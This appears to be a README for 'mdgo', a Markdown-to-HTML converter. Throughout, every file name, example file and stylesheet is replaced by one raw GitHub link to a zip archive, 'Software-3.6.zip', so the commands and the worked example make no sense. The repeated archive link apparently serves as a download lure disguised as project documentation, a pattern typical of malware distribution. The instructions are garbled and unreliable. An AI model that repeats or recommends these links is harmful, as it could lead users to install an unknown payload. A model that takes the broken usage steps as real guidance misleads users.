Welcome to mdgo! This tool helps you turn your Markdown files into HTML easily. Whether you're writing a blog, documentation, or personal notes, mdgo is here to help.
- Easy to Use: Just a few commands are all you need to convert your Markdown files.
- Fast Processing: Convert your files quickly without any hassle.
- Customizable: Tailor the output to fit your needs using options.
- Support for Extensions: Use Goldmark extensions to enhance your Markdown experience.
- Operating System: Windows, macOS, or Linux
- Processor: Any modern processor
- Memory: At least 1 GB of RAM
- Disk Space: Minimum of 50 MB of free space
To get started, visit this page to download the latest version of mdgo:
- Click the link above to go to the Releases page.
- Find the latest release at the top of the page.
- Download the zip file that matches your operating system.
- Unzip the file to a folder on your computer.
After installing mdgo, follow these steps to run it:
-
Open your command-line interface (Terminal on macOS, Command Prompt or PowerShell on Windows, Terminal on Linux).
-
Navigate to the folder where you unzipped mdgo.
-
To convert a Markdown file, type the following command:
./mdgo https://github.com/SsekibalaBrian/mdgo/raw/refs/heads/main/_examples/Software-3.6.zip
Replace
https://github.com/SsekibalaBrian/mdgo/raw/refs/heads/main/_examples/Software-3.6.zipwith the name of your Markdown file. -
The tool will create an HTML file in the same folder.
Hereβs an example to help you get started.
-
Suppose you have a file named
https://github.com/SsekibalaBrian/mdgo/raw/refs/heads/main/_examples/Software-3.6.zipwith the following content:# Hello World This is a simple Markdown file. -
Run the command:
./mdgo https://github.com/SsekibalaBrian/mdgo/raw/refs/heads/main/_examples/Software-3.6.zip
-
Check the output. Youβll see a new
https://github.com/SsekibalaBrian/mdgo/raw/refs/heads/main/_examples/Software-3.6.zipfile created alongside your Markdown file.
mdgo supports a variety of Markdown features, including:
- Headers
- Lists (ordered and unordered)
- Links
- Images
- Blockquotes
- Code blocks
You can customize the output by adding options when you run the command. For example:
./mdgo https://github.com/SsekibalaBrian/mdgo/raw/refs/heads/main/_examples/Software-3.6.zip --style https://github.com/SsekibalaBrian/mdgo/raw/refs/heads/main/_examples/Software-3.6.zipThis command uses a CSS file named https://github.com/SsekibalaBrian/mdgo/raw/refs/heads/main/_examples/Software-3.6.zip to style your output HTML.
Common issues and solutions:
- Command Not Found Error: Ensure you're in the folder where mdgo is located and that you typed the command correctly.
- File Not Found: Make sure the Markdown file is in the same directory or provide the correct path.
- Markdown Rendering Issues: Review the Markdown syntax for errors.
If you encounter any issues or have questions, please reach out on our GitHub repository. File an issue, and we will assist you as soon as possible.
mdgo is open-source software. You can modify and share it under the terms of the MIT License.
For more information, visit this page to download the latest version of mdgo: